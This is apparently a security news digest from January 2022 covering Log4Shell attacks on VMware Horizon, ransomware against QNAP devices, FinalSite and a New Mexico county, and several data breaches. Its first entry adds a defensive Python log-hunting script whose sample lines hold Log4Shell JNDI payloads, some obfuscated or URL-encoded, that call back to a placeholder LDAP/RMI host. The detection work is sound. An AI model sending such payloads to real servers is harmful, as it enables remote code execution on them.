January 7, 2022

Fortify Security Team

Title: NHS Warns of Hackers Exploiting Log4shell in VMware Horizon
Date Published: January 7, 2022

https://www.bleepingcomputer.com/news/security/nhs-warns-of-hackers-exploiting-log4shell-in-vmware-horizon/

Excerpt: “According to the NHS notice, the actor is leveraging the exploit to achieve remote code execution on vulnerable VMware Horizon deployments on public infrastructure. “The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface™ (JNDI) via Log4Shell payloads to call back malicious infrastructure,” explains the alert. “Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service.””
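The chain the alert describes starts with a JNDI lookup string reaching a Log4j logger and only then fetches a class over LDAP (or RMI). That first stage is visible in ordinary web-server access logs, so it can be hunted before the web shell lands. The script below is an added example for this digest entry, not code from the NHS alert, BleepingComputer or VMware. The access-log lines are constructed, the callback address 203.0.113.10 is from the documentation range, and the file name and function names are the example's own. It URL-decodes each line, collapses the nested-lookup tricks (`${lower:j}`, `${::-j}`) used to dodge a literal `${jndi:` match, and reports the scheme, host and port the victim would have called back to.

```python
"""Hunt for Log4Shell (CVE-2021-44228) JNDI lookup strings in access logs.

Added example for this digest entry; not code from the NHS alert,
BleepingComputer or VMware. The sample lines below are constructed and
203.0.113.10 is a documentation address, not a real callback host.
"""
import re
import sys
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format). Lines 2-4 carry
# a JNDI lookup in the User-Agent or query string: plain, nested-lookup
# obfuscated, and URL-encoded respectively.
SAMPLE_LOGS = [
    '10.0.0.5 - - [07/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [07/Jan/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [07/Jan/2022:10:01:09 +0000] "GET /portal/?x=${${lower:j}ndi:${::-l}dap://203.0.113.10:1389/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [07/Jan/2022:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%3A1099%2Fc%7D"',
]

# Innermost ${...} lookup, i.e. one whose body contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# What we are after once obfuscation is stripped: ${jndi:<scheme>:[//]<host>[:<port>]...
JNDI_PATTERN = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+):(?://)?(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def _resolve_lookup(match: "re.Match") -> str:
    """Evaluate the Log4j lookups attackers nest inside a payload to dodge a
    literal '${jndi:' match. Anything else, including the jndi lookup itself,
    is left in place."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    # Default-value syntax: ${::-j}, ${env:NOPE:-j}, ${sys:x:-j} all yield 'j'.
    if ":-" in body and not body.lower().startswith("jndi:"):
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize(text: str) -> str:
    """Undo URL encoding (repeatedly, for double-encoded payloads), then
    collapse nested lookups from the inside out until nothing changes."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        collapsed = INNER_LOOKUP.sub(_resolve_lookup, text)
        if collapsed == text:
            return text
        text = collapsed


def scan_logs(lines):
    """Return one finding per JNDI lookup found after normalization:
    1-based line number, scheme, callback host and port, and the raw line."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        for m in JNDI_PATTERN.finditer(normalize(raw)):
            findings.append({
                "line": number,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": int(m.group("port")) if m.group("port") else None,
                "raw": raw,
            })
    return findings


if __name__ == "__main__":
    # Usage: python log4shell_hunt.py [access.log]; without a file it scans the samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.readlines()
    else:
        lines = SAMPLE_LOGS
    for f in scan_logs(lines):
        print(f"line {f['line']}: {f['scheme']}://{f['host']}:{f['port']}  <- {f['raw'][:80]}")
```

Two caveats a practitioner should keep in mind. This only sees the reconnaissance stage, and only in logs that actually record the header or URL the payload arrived in; any logged field reaching a vulnerable Log4j can trigger the lookup, so the User-Agent and query string are the common cases, not the only ones. The host and port it extracts are the attacker's LDAP/RMI server, which is the right thing to block at the egress firewall; whether the second stage succeeded (the web shell the alert describes in the Blast Secure Gateway service) has to be confirmed on the Horizon host itself by comparing the gateway's files against a known-good install.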

Title: QNAP Warns of Ransomware Targeting Internet-Exposed NAS Devices
Date Published: January 7, 2022

https://www.bleepingcomputer.com/news/security/qnap-warns-of-ransomware-targeting-internet-exposed-nas-devices/

Excerpt: “QNAP has warned customers today to secure Internet-exposed network-attached storage (NAS) devices immediately from ongoing ransomware and brute-force attacks. “QNAP urges all QNAP NAS users to follow the security setting instructions below to ensure the security of QNAP networking devices,” the Taiwanese NAS maker said in a press release issued today. The company warned users to check if their NAS is accessible over the internet by opening the Security Counselor, a built-in security portal for QNAP NAS devices.”

Title: Ransomware Attack Suffered by FinalSite Shuts Down Thousands of Websites
Date Published: January 7, 2022

https://heimdalsecurity.com/blog/ransomware-attack-suffered-by-finalsite-shuts-down-thousands-of-websites/

Excerpt: “FinalSite is a software as a service (SaaS) company that provides K-12 school districts and institutions with website design, hosting, and content management solutions. FinalSite provides solutions for over 8,000 institutions and colleges in 115 countries. Recently, school districts whose websites were hosted by FinalSite discovered that they were no longer accessible or displayed errors. FinalSite did not reveal that they had been attacked at the time, instead stating that they were having error and “performance difficulties” across different services, primarily their Composer content management system.”

Title: Enterprises Worry About Increased Data Risk in Cloud
Date Published: January 6, 2022

https://www.darkreading.com/edge-threat-monitor/enterprises-worry-about-increased-data-risk-in-cloud

Excerpt: “The massive shift to a more distributed work environment and adoption of cloud services to support new business models over the past two years has impacted how enterprises assess cyber-risk and manage cloud vulnerabilities. Respondents to Dark Reading’s 2021 Strategic Security Survey say the shift away from on-premises infrastructures has significantly raised the level of cyber-risk associated with cloud services. When it comes to assessing risk, enterprises may be feeling more optimistic. In the 2020 survey, 31% of respondents said assessing risk was among the biggest information security challenges facing the organization. That figure drops to 24% in the 2021 survey. Similarly, 49% in 2020 named managing complexity as among the biggest challenges, while just 35% say so in the 2021 report.”

Title: Chinese Scientist Pleads Guilty to Stealing US Agricultural Tech
Date Published: January 7, 2022

https://www.zdnet.com/article/chinese-scientist-pleads-guilty-to-stealing-us-agricultural-tech/

Excerpt: “Monsanto and The Climate Corporation developed an online platform for farmers to manage field and yield information in a bid to improve land productivity. One aspect of this technology was an algorithm called the Nutrient Optimizer, which US prosecutors say was considered “a valuable trade secret and their intellectual property.” According to the DoJ, the former employee stole this information “for the purpose of benefiting a foreign government, namely the People’s Republic of China.” In June 2017, Xiang left these companies and boarded a flight back to China a day after. The 44-year-old drew the attention of airport officials who conducted a search — but it was not until later that investigators found copies of the Nutrient Optimizer stored on his electronic devices.”

Title: Thousands of Schools Impacted After IT Provider Hit by Ransomware
Date Published: January 7, 2022

https://www.infosecurity-magazine.com/news/thousands-of-schools-it-provider/

Excerpt: “Finalsite claimed it had uncovered no evidence that data had been stolen as part of the raid but admitted that forensic work was still ongoing. Double extortion involving the threat of leaking stolen data is now the norm for such attacks, according to ransomware experts. According to Coveware, over 80% of attacks in Q3 involved the theft of corporate information alongside file encryption. There’s no sign of exactly how many schools have been impacted by the attack, although a Reddit user claimed around 2,200 might have been disrupted.”

Title: Over 3.7 Million Accounts Were Compromised in the Flexbooker Data Breach
Date Published: January 7, 2022

https://securityaffairs.co/wordpress/126409/data-breach/flexbooker-data-breach.html

Excerpt: “FlexBooker is an online appointment scheduling platform that allows users to schedule appointments and sync employee calendars. The attack was carried out by a group calling themselves Uawrongteam, who published links to archives and files containing IDs, driver’s licenses, photos. The threat actors claim the stolen database contains customer information, including names, emails, phone numbers, hashed passwords, and password salt. The company already notified local authorities and sent a data breach notification to the impacted customers. According to the notification, threat actors compromised the service’s Amazon cloud storage system.”

Title: Night Sky, a New Ransomware Operation in the Threat Landscape
Date Published: January 7, 2022

https://securityaffairs.co/wordpress/126400/malware/night-sky-ransomware-operation.html

Excerpt: “Researchers from MalwareHunterteam first spotted a new ransomware family dubbed Night Sky that implements a double extortion model in attacks aimed at businesses. Once it has encrypted a file, the ransomware appends the ‘.night sky’ extension to encrypted file names. The ransomware gang started its operations on December 27, 2021, and has already hacked the corporate networks of two organizations from Bangladesh and Japan respectively. The gang has also set up a leak site on the Tor network where it will publish files stolen from the victims that will not pay the ransom.”

Title: New Mexico’s Bernalillo County Investigates Ransomware Attack
Date Published: January 6, 2022

https://www.darkreading.com/attacks-breaches/new-mexico-s-bernalillo-county-investigates-ransomware-attack

Excerpt: “Bernalillo County is the most populous in New Mexico and includes the cities of Albuquerque, Los Ranchos, and Tijeras. Officials report the disruption likely occurred between midnight and 5:30 a.m. on Jan. 5. They have taken affected systems offline and severed network connections, as well as notified county system vendors, which are working to solve the issue and restore system functionality. While county buildings and offices are closed to the public, employees are working remotely to assist the public, officials wrote in a release. Emergency and public safety services are fully operational, Behavioral Health is operational, and community centers will remain open as scheduled. Its Treasurer’s Office is accepting tax payments through its online portal, through county drop boxes, and at any branch of the Rio Grande Credit Union, officials wrote.”

Title: Threat Actors Stole 1.1 Million Customer Accounts from 17 Well-Known Companies
Date Published: January 6, 2022

https://securityaffairs.co/wordpress/126381/cyber-crime/credential-stuffing-ny-oag-report.html

Excerpt: “After reviewing thousands of posts, the OAG compiled login credentials for customer accounts at 17 well-known companies, which included online retailers, restaurant chains, and food delivery services. In all, the OAG collected credentials for more than 1.1 million customer accounts, all of which appeared to have been compromised in credential stuffing attacks.” reads the report published by NY OAG. “The OAG contacted each of the 17 companies to alert them to the compromised accounts. The OAG also asked the companies to investigate and take steps to protect impacted customers. Every company did so.”
